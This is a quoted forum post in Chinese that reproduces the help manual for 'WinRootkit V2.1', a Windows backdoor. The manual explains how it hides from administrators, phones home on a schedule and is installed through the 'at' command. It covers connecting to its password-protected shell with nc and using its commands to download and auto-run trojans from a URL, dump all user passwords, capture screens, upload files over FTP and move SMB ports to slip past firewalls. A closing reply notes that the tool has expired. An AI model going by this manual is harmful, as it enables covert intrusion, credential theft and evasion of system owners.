引用:

WinRootkit V 2.1 帮助文档
程序介绍
主要功能:
安装后 无进程、无系统服务、无文件、无注册表项、隐藏端口、支持端口复用.
运行稳定,能够毫不影响服务器的正常运行.
如果配置通知ip方式的话,切记，每天晚上3点到3点5分(服务器时间)准时发出上线ip.
为了更加隐秘性，所以选择了这个时候发ip.而且只在5分钟内尝试发送3次ip信息.
如果选择了上线通知ip功能。请在你指定的Url上放置一文本.里面的文本格式如下:
[202.100.19.68:1234] 其中包括”[ ]”符号.
4、如果后门在运行状态下,检测到管理员在使用主机,则后门自动关闭退出.直等到管理员
离开计算机后又重新开放端口等待连接.这样更隐蔽的隐藏自身.
5、增加判断windows是否已锁定功能

安装方式:
建议使用命令行安装,命令
at 2:06 c:\server.exe
切记!安装时间自订,比如当前时间为2:03,就建议使用推迟几分钟.2:06

使用说明
一、本程序适用范围：windows2000 Server 、Windows 2003 Server
二、配置:
1、运行Winrootkit 2.1.exe，,根据自己所需要配置后,点击生成安装端可生成被控端。
三、安装。
1、在要控制主机上运行被控端即可。
四、操作方法。
1、使用NC.exe(瑞士军刀)
语法: DOS下输入:
Nc ip port (例子:nc 192.168.1.1 80)
然后回车,然后输入login,再回车.
2、出现欢迎界面。
这时输入连接密码，回车。如密码无误，会出现一个shell界面。
输入？号，可以显示帮助信息。
完整登陆例子:
NC 192.168.1.1 80
Login
pass

功能说明:
1、xver, 得到当前控制端程序的版本信息
2、pslist,列进程
3、pskill,杀进程   (例子:pskill 2522)
  参数: PID
PID指要中止进程的进程ID,如要杀多个进程,可用逗号分隔多个ID
4、geturl,从一个网址下载文件到syste32目录
  参数：url [-y or -n]
  url:网址 y:下载并自动运行 n:下载但不运行
(例子:geturl http://www.abc.com/muma.exe -y)
5、restart,重新启动远程计算机.
6、findpass,获取所有用户密码.
7、getsysinfo,获取系统信息,比如内存,开机时间
8、screen,抓取当前屏幕
    参数:filepath
    filepath:要保存文件的绝对路径
(例子:Screen c:\ok.bmp)
9、SMB 修改默认端口突破任意防火墙
使用命令 Smb 8080(这里的8080可以改成你想要的端口,防火墙不拦截的端口。)
详细说明:请查看目录下的 [修改Windows SMB相关服务的默认端口.Doc]文档

10、xftpup,上传文件到FTP服务器
参数:host user pwd filepath,
  host:FTP主机名 user:用户名 pwd:密码 filepath:要上传到服务器的文件路径
11、xftpdown,从FTP服务器下载文件
  参数:host user pwd remotefilepath localfilepath,
  host:FTP主机名 user:用户名 pwd:密码 remotefilepath:要从服务器下载的文件路径 localfilepath:要下载到本地的文件路径

12、exit,退出本次连接   

技巧篇:
假设 A、B 两台主机都安装了服务端,也可以先连接A机。然后在DOS下连接B机的服务端。
连接服务端之后,可以在DOS操作非HackerXdoor 的其他程序命令。(比如:Telnet\注册表操作等\)
完成时间: 2005-9-15
软件名称: WinRootkit v2.1b
开发环境: Microsoft Visual C++ 6.0
Microsoft Windows 2000 Professional 简体中文版 Service Pack2
测试环境: (在以下环境下测试正常)
Windows Server 2000 (中文、韩文、英文、日文、繁体)
Windows.Server.2003.Enterprise Service Pack1 (中文、韩文、英文、日文、繁体)
Windows Xp Professional Service Pack2 (中文、英文)

报软件过期了

可惜不能用了！